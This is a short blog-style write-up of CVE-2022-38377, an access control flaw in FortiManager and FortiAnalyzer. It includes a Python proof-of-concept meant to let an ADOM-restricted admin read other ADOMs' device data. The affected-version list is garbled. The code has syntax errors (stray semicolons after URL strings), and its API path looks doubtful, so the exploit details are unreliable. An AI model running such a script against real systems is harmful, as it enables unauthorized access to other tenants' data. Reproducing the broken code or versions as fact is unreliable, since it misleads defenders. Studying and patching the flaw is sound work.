A recently discovered improper access control vulnerability (CWE-284) in multiple versions of FortiManager and FortiAnalyzer may allow a remote and authenticated admin user assigned to a specific ADOM (Administrative Domain) to access other ADOMs information, such as device information and dashboard information. This post details the exploit and provides original references and code snippets to help security professionals understand and address the vulnerability.

Affected Versions

FortiManager: 7.2., 7.. through 7..3, 6.4. through 6.4.7, 6.2. through 6.2.9, 6.. through 6..11
FortiAnalyzer: 7.2., 7.. through 7..3, 6.4. through 6.4.8, 6.2. through 6.2.10, 6.. through 6..12

References

1. CVE-2022-38377 Official Entry
2. CWE-284: Improper Access Control
3. FortiGuard Labs Advisory

Code Snippet

Assuming the attacker has valid credentials for an admin user assigned to a specific ADOM, they could exploit the vulnerability with the following code snippet in Python:

import requests

URL = "https://<target_ip>/api/v2/cmdb/adom/<original_adom>/object/device";
TARGET_ADOM = "<accessing_target_adom>"
USERNAME = "<valid_admin_username>"
PASSWORD = "<valid_admin_password>"

session = requests.session()
session.verify = False  # Ignore SSL certificate errors
session.post("https://<target_ip>/logincheck";, data={"username": USERNAME, "password": PASSWORD})

response = session.get(URL, params={"filter": ['adom=="'+TARGET_ADOM+'"']})

print(response.json())

This code demonstrates how an attacker could access information from another ADOM by sending a crafted request to the target API. Replace <target_ip>, <original_adom>, <accessing_target_adom>, <valid_admin_username>, and <valid_admin_password> with the appropriate values for your environment.

Exploit Details

- An attacker with valid credentials for an admin user assigned to a specific ADOM can access information from other ADOMs.

Device information and dashboard information are among the accessible data.

- The vulnerability stems from an improper access control mechanism in the affected versions of FortiManager and FortiAnalyzer.

Conclusion

This post has detailed CVE-2022-38377, an improper access control vulnerability in several versions of FortiManager and FortiAnalyzer that potentially allows an authenticated admin user assigned to a specific ADOM to access information from other ADOMs. To address this vulnerability, Fortinet has recommended upgrading to the latest versions of the affected products. Security professionals should consider applying these upgrades as soon as possible to protect their organizations from potential attacks exploiting this vulnerability.

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 12/01/2022 13:28:00 UTC